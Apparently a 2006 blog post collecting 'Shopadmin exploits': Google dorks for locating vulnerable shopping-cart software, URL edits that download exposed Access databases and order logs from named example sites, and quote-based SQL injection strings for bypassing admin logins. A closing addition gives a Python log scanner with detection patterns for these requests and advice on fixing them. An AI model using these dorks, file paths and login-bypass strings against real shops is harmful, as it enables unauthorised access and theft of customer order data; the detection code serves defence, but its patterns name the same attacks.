Collection of Shopadmin Exploits
google dork : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/...ir_Manuals.htm
insert the bug : http://www.target.com/cgi-bin/store/...iles/order.log
keyword : inurl:"/cart.php?m="
Bugs : Admin
replace the text cart.php?m=view with admin
log in using SQL Injection :
username :'or"="
Password : 'or"="
Keyword : /ashopKart20/"
bugs : replace the text in front of it with admin/scart.mdb
example : www.garrysun.com/ashopkart20/addprod.asp
Injection : www.garrysun.com/ashopkart20/admin/scart.mdb
keyword : /shop/category.asp/catid=
Bugs : delete the text /shop/category.asp?catid=2 and replace it with /admin/dbsetup.asp
example : www.littlesport.net/shop/category.asp?catid=2
insert the bug so it becomes : www.littlesport.net//admin/dbsetup.asp
then replace that bug with /data/pdshoppro.mdb
keyword : inurl:"/store/proddetail.asp?prod="
bugs : replace the text proddetail.asp?prod= with fpdb/vsproducts.mdb
google dork : "Powered by SunShop 3.2"
Or google dork : inurl:"/sunshop/index.php?action="
Bugs : replace the word index.php with admin
Example: http://www.domain.com/sunshop/index.php
replace with admin http://www.domain.com/sunshop/admin
Log in using SQL Injection :
Username : admin
Password :'or''='
Google dork : "Powered by Digishop 3.2"
Bugs : replace the text cart.php?m= with admin
Username : 'or"="
Password : 'or"="
google dork : inurl:"mall/lobby.asp"
bugs : replace the text /mall/lobby.asp with fpdb/shop.mdb
example : Gem Depot Lobby Page - Search our Inventory
http://www.gemdepot.com/fpdb/shop.mdb
keyword allinurl:/DCShop/
bug: /DCShop/orders/orders.txt or
/DCShop/Orders/orders.txt
keyword allinurl:/eshop/
bug: /cg-bin/eshop/database/order.mdb
example: http://www.contoh.com/.../cg-bin/eshop/database/order.mdb
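
Seen from the server side, every entry above leaves the same trace in the access log: a request for a database or order file stored under the web root, or a quote-or-quote string in a login parameter. The Python below is an added example, not part of the original post; it assumes combined-format access logs, and the sample lines, client addresses and the login.php path are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined/common log format: client address, request target, status code.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')
# Files the entries above fetch directly: Access databases, order logs, DB setup page.
DATA_FILE = re.compile(r"(\.mdb|/orders?\.(log|txt)|/dbsetup\.asp)$", re.I)
# Quote-or-quote tautology in a query string (only visible when the login uses GET).
TAUTOLOGY = re.compile(r"""['"]\s*or\s*['"]""", re.I)

def classify(line):
    """Return (client, finding) for a suspicious request, else None."""
    m = LINE.match(line)
    if not m:
        return None
    client, target, status = m.group(1), m.group(2), int(m.group(3))
    raw_path, _, raw_query = target.partition("?")
    path = re.sub(r"/+", "/", unquote(raw_path))  # decode %xx, collapse //
    if DATA_FILE.search(path):
        # A 2xx status means the file was actually served to the client.
        kind = "exposed" if 200 <= status < 300 else "probe"
        return client, f"{kind}:{path}"
    if TAUTOLOGY.search(unquote(raw_query.replace("+", " "))):
        return client, f"sqli-login:{path}"
    return None

def scan(lines):
    """Group findings by client address, in log order."""
    findings = defaultdict(list)
    for line in lines:
        hit = classify(line)
        if hit:
            findings[hit[0]].append(hit[1])
    return dict(findings)

# Constructed sample log lines (documentation addresses, hypothetical login path).
SAMPLE = [
    '203.0.113.7 - - [14/Jul/2006:10:00:01 +0000] "GET /shop/category.asp?catid=2 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [14/Jul/2006:10:00:05 +0000] "GET //admin/dbsetup.asp HTTP/1.1" 200 2048',
    '203.0.113.7 - - [14/Jul/2006:10:00:09 +0000] "GET /data/pdshoppro.mdb HTTP/1.1" 200 884736',
    '198.51.100.9 - - [14/Jul/2006:11:02:00 +0000] "GET /fpdb/shop%2Emdb HTTP/1.1" 404 312',
    '198.51.100.9 - - [14/Jul/2006:11:02:30 +0000] "GET /admin/login.php?user=admin&pass=%27or%27%27%3D%27 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE).items():
        print(client, hits)
```

An "exposed" finding means the file was served and the data in it should be treated as disclosed; the durable fix is to keep databases and order logs outside the document root and to use parameterized queries in the login handler.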
Friday, July 14, 2006